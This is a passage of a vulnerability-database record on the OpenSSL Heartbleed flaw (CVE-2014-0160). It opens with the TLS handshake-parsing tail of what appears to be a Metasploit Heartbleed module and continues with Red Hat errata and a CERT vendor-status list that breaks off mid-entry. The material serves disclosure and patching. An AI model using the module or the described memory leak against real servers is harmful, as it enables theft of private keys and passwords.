HANDSHAKE_SERVER_HELLO_DONE_TYPE\n vprint_status(\"\\t\\tType: Server Hello Done (#{hs_type})\")\n else\n vprint_status(\"\\t\\tType: Handshake type #{hs_type} not implemented\")\n end\n\n handshakes << {\n :type => hs_type,\n :len => hs_len,\n :data => handshake_parsed\n }\n remaining_data = remaining_data[(hs_len + 4)..-1]\n end\n\n handshakes\n end\n\n # Parse Server Hello message\n def parse_server_hello(data)\n version = data.unpack('H4')[0]\n vprint_status(\"\\t\\tServer Hello Version: 0x#{version}\")\n random = data[2,32].unpack('H*')[0]\n vprint_status(\"\\t\\tServer Hello random data: #{random}\")\n session_id_length = data[34,1].unpack('C')[0]\n vprint_status(\"\\t\\tServer Hello Session ID length: #{session_id_length}\")\n session_id = data[35,session_id_length].unpack('H*')[0]\n vprint_status(\"\\t\\tServer Hello Session ID: #{session_id}\")\n # TODO Read the rest of the server hello (respect message length)\n\n # TODO: return hash with data\n true\n end\n\n # Parse certificate data\n def parse_certificate_data(data)\n # get certificate data length\n unpacked = data.unpack('Cn')\n cert_len_padding = unpacked[0]\n cert_len = unpacked[1]\n vprint_status(\"\\t\\tCertificates length: #{cert_len}\")\n vprint_status(\"\\t\\tData length: #{data.length}\")\n # contains multiple certs\n already_read = 3\n cert_counter = 0\n while already_read < cert_len\n cert_counter += 1\n # get single certificate length\n single_cert_unpacked = data[already_read, 3].unpack('Cn')\n single_cert_len_padding = single_cert_unpacked[0]\n single_cert_len = single_cert_unpacked[1]\n vprint_status(\"\\t\\tCertificate ##{cert_counter}:\")\n vprint_status(\"\\t\\t\\tCertificate ##{cert_counter}: Length: #{single_cert_len}\")\n certificate_data = data[(already_read + 3), single_cert_len]\n cert = OpenSSL::X509::Certificate.new(certificate_data)\n # First received certificate is the one from the server\n @cert = cert if @cert.nil?\n #vprint_status(\"Got certificate: #{cert.to_text}\")\n vprint_status(\"\\t\\t\\tCertificate ##{cert_counter}: #{cert.inspect}\")\n already_read = already_read + single_cert_len + 3\n end\n\n # TODO: return hash with data\n true\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb"}], "redhat": [{"lastseen": "2018-12-11T19:42:54", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "i686", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-16.el6_5.7.i686.rpm", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "reporter": "RedHat", "published": "2014-04-08T04:00:00", "type": "redhat", "title": "(RHSA-2014:0376) Important: openssl security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:06", "id": "RHSA-2014:0376", "href": "https://access.redhat.com/errata/RHSA-2014:0376", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T17:44:57", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "x86_64", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-16.el6_5.7.x86_64.rpm", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll users of Red Hat Storage are advised to upgrade to these updated\npackages, which contain a backported patch to correct this issue. For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n", "reporter": "RedHat", "published": "2014-04-08T04:00:00", "type": "redhat", "title": "(RHSA-2014:0377) Important: openssl security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2015-04-24T14:20:43", "id": "RHSA-2014:0377", "href": "https://access.redhat.com/errata/RHSA-2014:0377", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T19:42:04", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.5-20140407.0.el6ev", "arch": "noarch", "packageName": "rhev-hypervisor6", "packageFilename": "rhev-hypervisor6-6.5-20140407.0.el6ev.noarch.rpm", "operator": "lt"}], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects this issue.\n", "reporter": "RedHat", "published": "2014-04-08T04:00:00", "type": "redhat", "title": "(RHSA-2014:0378) Important: rhev-hypervisor6 security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:59:45", "id": "RHSA-2014:0378", "href": "https://access.redhat.com/errata/RHSA-2014:0378", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T19:40:55", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.5-20140118.1.3.2.el6_5", "arch": "noarch", "packageName": "rhev-hypervisor6", "packageFilename": "rhev-hypervisor6-6.5-20140118.1.3.2.el6_5.noarch.rpm", "operator": "lt"}], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nImportant: This update is an emergency security fix being provided outside\nthe scope of the published support policy for Red Hat Enterprise\nVirtualization listed in the References section. In accordance with the\nsupport policy for Red Hat Enterprise Virtualization, Red Hat Enterprise\nVirtualization Hypervisor 3.2 will not receive future security updates.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects this issue.\n", "reporter": "RedHat", "published": "2014-04-10T04:00:00", "type": "redhat", "title": "(RHSA-2014:0396) Important: rhev-hypervisor6 security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:59:36", "id": "RHSA-2014:0396", "href": "https://access.redhat.com/errata/RHSA-2014:0396", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2018-12-25T20:17:48", "_object_types": ["robots.models.cert.CertBulletin", "robots.models.base.Bulletin"], "references": ["http://heartbleed.com/", "http://seclists.org/oss-sec/2014/q2/22", "http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902", "https://tools.ietf.org/html/rfc6520", "http://www.openssl.org/news/openssl-1.0.1-notes.html", "http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbleed-detection-scripts-", "http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html", "http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/", "https://www.cert.fi/en/reports/2014/vulnerability788210.html", "http://xkcd.com/1354/", "https://code.google.com/p/mod-spdy/issues/detail?id=85", "http://www.exploit-db.com/exploits/32745/", "https://access.redhat.com/security/cve/CVE-2014-0160 ", "http://www.ubuntu.com/usn/usn-2165-1/", "http://www.freshports.org/security/openssl/", "https://blog.torproject.org/blog/openssl-bug-cve-2014-0160"], "description": "### Overview \n\nOpenSSL 1.0.1 and 1.0.2 beta contain a vulnerability that could disclose sensitive private information to an attacker. This vulnerability is commonly referred to as \"heartbleed.\"\n\n### Description \n\nOpenSSL versions 1.0.1 through 1.0.1f and 1.0.2 beta through 1.0.2-beta1 contain a flaw in its implementation of the TLS/DTLS heartbeat functionality ([RFC6520](<https://tools.ietf.org/html/rfc6520>)). This flaw allows an attacker to retrieve private memory of an application that uses the vulnerable OpenSSL libssl library in chunks of up to 64k at a time. Note that an attacker can repeatedly leverage the vulnerability to increase the chances that a leaked chunk contains the intended secrets. The sensitive information that may be retrieved using this vulnerability include:\n\n * Primary key material (secret keys)\n * Secondary key material (user names and passwords used by vulnerable services)\n * Protected content (sensitive data used by vulnerable services)\n * Collateral (memory addresses and content that can be leveraged to bypass exploit mitigations)\n \nPlease see the [Heartbleed](<http://heartbleed.com/>) website for more details. Exploit code for this vulnerability is publicly available. Any service that supports STARTTLS (imap,smtp,http,pop) may also be affected. \n--- \n \n### Impact \n\nBy attacking a service that uses a vulnerable version of OpenSSL, a remote, unauthenticated attacker may be able to retrieve sensitive information, such as secret keys. By leveraging this information, an attacker may be able to decrypt, spoof, or perform man-in-the-middle attacks on network traffic that would otherwise be protected by OpenSSL. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in [OpenSSL 1.0.1g](<http://www.openssl.org/news/secadv_20140407.txt>). Please contact your software vendor to check for availability of updates. Any system that may have exposed this vulnerability should regenerate any sensitive information (secret keys, passwords, etc.) with the assumption that an attacker has already used this vulnerability to obtain those items. Old keys should be revoked. \n \nReports indicate that the use of `mod_spdy` can prevent the updated OpenSSL library from being utilized, as mod_spdy uses its own copy of OpenSSL. Please see <https://code.google.com/p/mod-spdy/issues/detail?id=85> for more details. \n \n--- \n \n**Disable OpenSSL heartbeat support** \n \nThis issue can be addressed by recompiling OpenSSL with the `-DOPENSSL_NO_HEARTBEATS` flag. Software that uses OpenSSL, such as Apache or Nginx would need to be restarted for the changes to take effect. \n \n**Use Perfect Forward Secrecy (PFS)** \n \n[PFS](<http://en.wikipedia.org/wiki/Forward_secrecy>) can help minimize the damage in the case of a secret key leak by making it more difficult to decrypt already-captured network traffic. However, if a ticket key is leaked, then any sessions that use that ticket could be compromised. Ticket keys may only be regenerated when a web server is restarted. \n \n--- \n \n### Vendor Information\n\n720951\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Amazon \n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://aws.amazon.com/security/security-bulletins/aws-services-updated-to-address-openssl-vulnerability/>\n\n### __ Arch Linux \n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://bugs.archlinux.org/task/39775>\n\n### __ Aruba Networks, Inc. \n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.arubanetworks.com/support/alerts/aid-040814.asc>\n\n### __ __ Attachmate \n\nUpdated: April 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n`Some Attachmate products with specific versions are affected by the \nCVE-2014-0160 OpenSSL 'Heartbleed' vulnerability when TLS protocol \nconnections are used. All affected products now have either new versions \nor hot fixes available. \n \nAttachmate maintains the following technical note about affected and \nnon-vulnerable versions: \n<http://support.attachmate.com/techdocs/2724.html> \n \nIn addition, Security Updates technical notes are also available for \nspecific \nproducts: \nSecurity Updates and Reflection for the Web or Reflection Security Gateway \n<http://support.attachmate.com/techdocs/1704.html> \nSecurity Updates and Reflection \n<http://support.attachmate.com/techdocs/1708.html> \nSecurity Updates and Reflection for Secure IT \n<http://support.attachmate.com/techdocs/2288.html> \nSecurity Updates and EXTRA! \n<http://support.attachmate.com/techdocs/2501.html> \nSecurity Updates and Reflection 2014 or Reflection 2011 \n<http://support.attachmate.com/techdocs/2502.html> \nSecurity Updates and INFOConnect \n<http://support.attachmate.com/techdocs/2546.html> \nSecurity Updates and Verastream \n<http://support.attachmate.com/techdocs/2700.html>`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://support.attachmate.com/techdocs/2724.html\nhttp://support.attachmate.com/techdocs/1704.html\nhttp://support.attachmate.com/techdocs/1708.html\nhttp://support.attachmate.com/techdocs/2288.html\nhttp://support.attachmate.com/techdocs/2501.html\nhttp://support.attachmate.com/techdocs/2502.html\nhttp://support.attachmate.com/techdocs/2546.html\nhttp://support.attachmate.com/techdocs/2700.html>\n\n### __ __ Bee Ware \n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\ni-Suite versions 5.4.0 and above, up to version 5.5.4, are vulnerable. Versions 5.2.8 and 5.3.x are not vulnerable.\n\n### Vendor References\n\n<http://documentation.bee-ware.net/display/SECU/CVE-2014-0160+-+OpenSSL+Heartblee\nd+Bug>\n\n### __ Blue Coat Systems \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[http://kb.bluecoat.com/index?page=content&id=SA79](<http://kb.bluecoat.com/index?page=content&id=SA79>)\n\n### __ CA Technologies \n\nNotified: April 08, 2014 Updated: April 25, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={967F13F1-5720-4592-9BEB-42AD69EA14DC}\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={7EBD736F-0227-4AEB-A7A9-9C5A4EA449C3}>\n\n### __ Cisco Systems, Inc. \n\nNotified: April 08, 2014 Updated: April 10, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed>\n\n### __ Debian GNU/Linux \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.debian.org/security/2014/dsa-2896>\n\n### __ __ Extreme Networks \n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nThe following products and versions are affected by the VU#720951 OpenSSL vulnerability.\n\nExtremeXOS version 15.4.1.x - A patch update for ExtremeXOS 15.4.1.3-patch1-10 or higher is available for download \n \n64 bit (Ubuntu) NetSight Appliance version 4.4, 5.0, 5.1 and 6.0 - A patch update is currently available for 4.4, 5.0, 5.1 and 6.0 \n \n64 bit (Ubuntu) NAC Appliance version 5.0, 5.1 and 6.0 - A patch update is currently available for 5.0, 5.1 and 6.0. \n \n64 bit (Ubuntu) Purview Appliance version 6.0 - A patch update is currently available. \n \nNote: Please contact the Extreme Networks Global Technical Assistance Center (GTAC) for access to the patch in the event not found on the Extreme Networks support site. \n \nExtreme Networks has also published the below advisory on its website. Please refer the same for additional information. \n<http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### __ F5 Networks, Inc. \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217>\n\n### __ Fedora Project \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### __ __ Fortinet, Inc. \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe have determined that the following products are vulnerable:\n\nFortiGate (FortiOS) 5.0 and higher \nFortiAuthenticator 3.0 and higher \nFortiMail 5.0 and higher \nFortiVoice (all versions) \nFortiRecorder (all versions)\n\n### Vendor References\n\n<http://www.fortiguard.com/advisory/FG-IR-14-011/>\n\n### __ __ FreeBSD Project \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nFreeBSD 10.0-RELEASE, 10.0-STABLE and 11.0-CURRENT have been patched\n\nfor this issue (CVE-2014-0160/VU #720951), both in source and binary \n(via freebsd-update) forms. Earlier FreeBSD releases are not affected \nby this issue.\n\n### Vendor References\n\n<http://www.freebsd.org/security/advisories/FreeBSD-SA-14:06.openssl.asc>\n\n### __ Gentoo Linux \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.gentoo.org/security/en/glsa/glsa-201404-07.xml>\n\n### __ __ Global Technology Associates, Inc. \n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n**Statement Date: April 23, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nWe have determined that GTA firewalls running the following versions of GB-OS are vulnerable and should be upgraded to the indicated version.\n\nGB-OS version 6.1.0 to 6.1.5 are vulnerable and should upgrade to GB-OS 6.1.6 \nGB-OS version 6.0.0 to 6.0.7 are vulnerable and should upgrade to GB-OS 6.0.8 \n \nCustomers using GTA firewalls with an unsupported version of GB-OS should upgrade to a currently supported version.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Google \n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://googleonlinesecurity.blogspot.com/2014/04/google-services-updated-to-address.html\nhttps://groups.google.com/forum/?_escaped_fragment_=topic/mod-spdy-discuss/EwCowyS1KTU#!topic/mod-spdy-discuss/EwCowyS1KTU>\n\n### Addendum\n\nmod_spdy is affected, as are some versions of the Google Search Appliance GSA 7.0.14.G.212 addresses this issue.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ Hewlett-Packard Company \n\nNotified: April 08, 2014 Updated: May 02, 2014 \n\n**Statement Date: April 14, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://h17007.www1.hp.com/docs/advisories/HPNetworkingSecurityAdvisory-OpenSSL-HeartbleedVulnerability.pdf\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236102\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236062\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239372\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04240206\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04242672\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239374\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04250814\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04248997\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04255796\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260353\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260456\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260505\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262472\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262670\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04261644\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n\n### __ __ Hitachi \n\nNotified: April 08, 2014 Updated: May 27, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n`Hitachi has published the below advisory on its website. Please refer \nthe advisory for additional information. This advisory includes \nHitachi products for Industrial Control Platform. \n \nHIRT-PUB14005: OpenSSL TLS heartbeat extension read overrun issue in \nHitachi products (VU#720951, CVE-2014-0160) \n<http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>\n\n### __ IBM Corporation \n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[https://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc http://www-01.ibm.com/support/docview.wss?&uid=swg21669774](<https://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc\nhttp://www-01.ibm.com/support/docview.wss?&uid=swg21669774>)\n\n### __ Intel Corporation \n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n**Statement Date: April 15, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr](<https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr>)\n\n### __ Juniper Networks, Inc. \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://kb.juniper.net/JSA10623>\n\n### __ Mandriva S. A. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ MarkLogic Corporation \n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`Recently a serious security vulnerability was discovered in the OpenSSL \ncryptographic software \nlibrary. MarkLogic application servers can be configured to use SSL, and \nMarkLogic uses OpenSSL to \nprovide this capability. A patch to OpenSSL has been released to address \nthis vulnerability, and \nMarkLogic has built patches for all impacted MarkLogic versions with \nOpenSSL 1.0.1g to incorporate \nthis new fix. \n \n \n \nImpacted Versions \n \n \n \nThe following versions of MarkLogic are impacted by this vulnerability: \n \n\u00b7 MarkLogic 5.0-5 through 5.0-6 \n \n\u00b7 All versions of MarkLogic 6.0 (6.0-1 through 6.0-5) \n \n\u00b7 All versions of MarkLogic 7.0 (7.0-1 through 7.0-2.2), \nincluding the MarkLogic AMIs \n \n \n \nMarkLogic versions prior to 5.0-5 use an earlier version of OpenSSL that \ndoes not have this \nvulnerability. \n \n \n \nHow to Patch \n \n \n \nWe recommend that customers who are using SSL patch their systems \nimmediately. To do this: \n \n1. Upgrade your cluster to the patch release, available at \n<http://developer.marklogic.com/products>. \n \nPatch release versions are as follows: \n \no MarkLogic 5.0-6.1 \n \no MarkLogic 6.0-5.1 \n \no MarkLogic 7.0-2.3 \n \n2. Regenerate all SSL certificates for your cluster. This is \nnecessary because the \nvulnerability is such that private keys for your certificates are \npotentially compromised. See \n\ud840\uddcconfiguring SSL on App Servers\u201d in the documentation: \n \no MarkLogic 5 documentation: \n<http://docs.marklogic.com/5.0/guide/admin/SSL#chapter> \n \no MarkLogic 6 documentation: \n<http://docs.marklogic.com/6.0/guide/admin/SSL#chapter> \n \no MarkLogic 7 documentation: \n<http://docs.marklogic.com/guide/admin/SSL#chapter> \n \n3. If you are using BASIC or Application Level Authentication over \nSSL, have all your \nusers change their passwords after you've patched and deployed new SSL \ncertificates. This includes \nboth internal users in our security 